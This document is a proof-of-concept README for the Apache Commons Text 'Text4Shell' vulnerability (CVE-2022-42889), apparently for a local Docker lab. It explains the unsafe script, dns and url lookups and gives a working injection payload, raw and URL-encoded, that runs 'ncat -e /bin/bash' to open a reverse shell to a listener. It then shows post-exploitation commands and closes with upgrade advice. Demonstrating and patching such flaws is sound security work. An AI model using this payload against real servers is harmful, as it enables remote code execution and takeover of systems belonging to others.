Proof of Concept for the Apache commons-text vulnerability CVE-2022-42889.
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used.
Apache Commons Text Version 1.5
To 1.9
docker build --tag=test/text4shell .
docker run -it -p 80:8080 --name text4shell test/text4shell
docker exec -it text4shell /bin/bash
nc -nlvp 8888
curl http://localhost/text4shell/attack?search=<anything>
Attack can be performed by passing a string "${prefix:name}" where the prefix is the aforementioned lookup: ${script:javascript:java.lang.Runtime.getRuntime().exec('ncat -e /bin/bash 172.17.0.1 8888')}
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27ncat%20-e%20%2Fbin%2Fbash%20172.17.0.1%208888%27%29%7D
pwd
cd /root
pwd
ls
pwd
cd /root
pwd
ls
touch hacked.txt
ls
pwd
ls
If you able to see hacked.txt file on Terminal Tab 3 after ls command. The attack is executed.
Users are recommended to upgrade to Apache Commons Text 1.10.0
, which disables the problematic interpolators by default.